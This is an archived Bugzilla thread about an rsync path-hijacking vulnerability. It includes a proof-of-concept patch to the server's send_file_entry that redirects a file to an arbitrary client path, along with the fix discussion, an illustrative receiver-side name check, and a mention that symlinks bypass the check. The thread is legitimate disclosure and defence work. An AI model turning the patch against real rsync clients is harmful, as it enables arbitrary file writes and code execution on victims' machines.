samba-bugs at samba.org
2014-Nov-14 06:51 UTC
[Bug 10936] New: Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

            Bug ID: 10936
           Summary: Rsync path hijacking attack vulnerability
           Product: rsync
           Version: 3.1.1
          Hardware: All
                OS: All
            Status: NEW
          Severity: critical
          Priority: P5
         Component: core
          Assignee: wayned at samba.org
          Reporter: gaojianfeng at baidu.com
        QA Contact: rsync-qa at samba.org

Created attachment 10433
  --> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit
Rsync path hijacking attack vulnerability.pdf (Detailed documentation)

Hi all:

In the newest version of rsync, Baidu Security Team found a vulnerability which is similar to the wget FTP CVE-2014-4877 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877). When a client uses the parameter -a to synchronize files from the server side (the default), for example:

    rsync -avzP 127.0.0.1::share /tmp/share

rsync recursively synchronizes all files. An attacker can hijack the file path by modifying the code of the server side, which allows remote servers to write to arbitrary files, and consequently execute arbitrary code.

Vulnerability Details:

First I wrote the following files in the shared rsync folder:

    [root at pentest rsync]# ls -lh
    total 8.0K
    -rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
    drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
    [root at pentest rsync]# cd truedir/
    [root at pentest truedir]# ls
    pwned
    [root at pentest truedir]# cat pwned
    rsync test
    [root at pentest truedir]#

Next I modified the server's file-sending code; in the process of synchronizing, the path of the file "pwned" can be intercepted and changed into any path.
file: flist.c line: 394

    static void send_file_entry(int f, const char *fname, struct file_struct *file,
    #ifdef SUPPORT_LINKS
                                const char *symlink_name, int symlink_len,
    #endif
                                int ndx, int first_ndx)
    {
            /* attacker's modification: rewrite the advertised name of truedir/pwned */
            if (strcmp(fname, "truedir/pwned") == 0) {
                    fname = "/root/pwned.test"; /* arbitrary path */
            }

Then verification occurs on the server side and says "received request to transfer non-regular file /root/pwned.test 7 [sender]", but as an attacker the code of the server side can be arbitrarily controlled, so I shield (comment out) the following code.

file: rsync.c line: 405

    /*
            if (iflags & ITEM_TRANSFER) {
                    int i = ndx - cur_flist->ndx_start;
                    if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
                            rprintf(FERROR, "received request to transfer non-regular file: %d [%s]\n",
                                    ndx, who_am_i());
                            exit_cleanup(RERR_PROTOCOL);
                    }
            }
    */

The file "pwned" will be downloaded into the forged path (/root/pwned.test).

-- 
You are receiving this mail because:
You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-14 23:24 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

--- Comment #1 from roland <devzero at web.de> ---
In other words: a malicious rsync server can force a client to create any file in any path, as long as the client can write to that path?

Indeed, interesting find, and a security bug then.
samba-bugs at samba.org
2014-Nov-17 03:01 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

--- Comment #2 from gaojianfeng <gaojianfeng at baidu.com> ---
(In reply to roland from comment #1)

Yes.
samba-bugs at samba.org
2014-Nov-27 19:29 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

Wayne Davison <wayned at samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
         Resolution|---                         |FIXED
             Status|NEW                         |RESOLVED

--- Comment #3 from Wayne Davison <wayned at samba.org> ---
In your test, you didn't use 3.1.1 on the client side. This was fixed in that release:

    ABORTING due to unsafe pathname from sender: /root/pwned.test
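The abort quoted in comment #3 is the receiver refusing a name from the sender's file list before anything is created on disk. The following C is an added illustration of that receiver-side property and is not rsync's own code (rsync performs its check inside flist.c with its own clean_fname() helper; the names, the NAME_MAX_DEMO bound and the sample inputs below are assumptions of this example). It normalises a received name in place, then rejects it if it is absolute or contains a ".." component, so a modified send_file_entry() advertising "/root/pwned.test" is stopped regardless of what other server-side checks the attacker has commented out. Note that this is purely a string check on the name: it says nothing about where a symlink inside the destination might point, which is the separate issue the reporter raises later in this thread.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_DEMO 1024   /* assumed name bound for this example */

/* Normalise a received name in place: collapse runs of '/', drop "."
 * components and any trailing '/'.  A leading '/' is kept so the caller
 * can still see that the sender asked for an absolute path.  The result
 * is never longer than the input, so rewriting in place is safe.
 * Returns -1 if a ".." component was seen, 0 otherwise. */
static int clean_received_name(char *name)
{
    char *src = name, *dst = name;
    int saw_dotdot = 0;

    if (*src == '/') {                  /* absolute: keep one '/', squash the rest */
        *dst++ = '/';
        while (*src == '/')
            src++;
    }
    while (*src) {
        char *start = src;
        size_t len;

        while (*src && *src != '/')     /* find the end of this component */
            src++;
        len = (size_t)(src - start);
        while (*src == '/')             /* swallow the separator run */
            src++;

        if (len == 0 || (len == 1 && start[0] == '.'))
            continue;                   /* empty or "." adds nothing */
        if (len == 2 && start[0] == '.' && start[1] == '.')
            saw_dotdot = 1;             /* keep it visible, but flag it */

        if (dst != name && dst[-1] != '/')
            *dst++ = '/';
        memmove(dst, start, len);
        dst += len;
    }
    *dst = '\0';
    return saw_dotdot ? -1 : 0;
}

/* Policy: after cleaning, a name is safe only if it is relative and has
 * no ".." component.  An empty result is the destination directory
 * itself (rsync sends "." for it), which is fine. */
static bool received_name_is_safe(char *name)
{
    if (clean_received_name(name) < 0)
        return false;
    return name[0] != '/';
}

/* Wrapper for callers holding a const string; optionally hands back the
 * normalised form.  Over-long names are refused outright. */
bool check_received_name(const char *name, char *out, size_t outlen)
{
    char tmp[NAME_MAX_DEMO];
    bool ok;

    if (strlen(name) >= sizeof tmp)
        return false;
    strcpy(tmp, name);
    ok = received_name_is_safe(tmp);
    if (out && outlen) {
        strncpy(out, tmp, outlen - 1);
        out[outlen - 1] = '\0';
    }
    return ok;
}

/* True if normalising `name` yields exactly `expect`. */
bool cleaned_name_equals(const char *name, const char *expect)
{
    char out[NAME_MAX_DEMO];
    check_received_name(name, out, sizeof out);
    return strcmp(out, expect) == 0;
}

int main(void)
{
    /* Constructed sample names: what an honest sender emits for the share
     * in this report, and what the modified send_file_entry() emits. */
    const char *samples[] = {
        "truedir/pwned",
        "./truedir//pwned/",
        "/root/pwned.test",
        "truedir/../../root/pwned.test",
        NULL
    };
    char out[NAME_MAX_DEMO];

    for (int i = 0; samples[i]; i++) {
        bool ok = check_received_name(samples[i], out, sizeof out);
        printf("%-32s -> %s\n", samples[i],
               ok ? out : "ABORTING due to unsafe pathname from sender");
    }
    return 0;
}
```

The check runs on the receiver before any open() or mkdir(), which is the only place it can live: everything the sender says about a file, including its name, is attacker-controlled once the daemon binary has been modified.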
samba-bugs at samba.org
2014-Nov-27 20:01 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

--- Comment #4 from roland <devzero at web.de> ---
That fix is these two commits, correct?

https://git.samba.org/?p=rsync.git;a=commit;h=371242e4e8150d4f9cc74cdf2d75d8250535175e
https://git.samba.org/?p=rsync.git;a=commit;h=4cad402ea8a91031f86c53961d78bb7f4f174790
samba-bugs at samba.org
2014-Nov-27 20:10 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

--- Comment #5 from Wayne Davison <wayned at samba.org> ---
(In reply to roland from comment #4)

Yes, those are the commits for this bug.
samba-bugs at samba.org
2014-Dec-01 07:16 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936

--- Comment #6 from gaojianfeng <gaojianfeng at baidu.com> ---
(In reply to Wayne Davison from comment #3)

Yes! In the newest version of rsync (3.1.1), directly modifying the file path into an absolute path does not succeed in hijacking, due to the security checks, but using symbolic links can still bypass the security checks and spoof the client.

A new bug I submitted: https://bugzilla.samba.org/show_bug.cgi?id=10977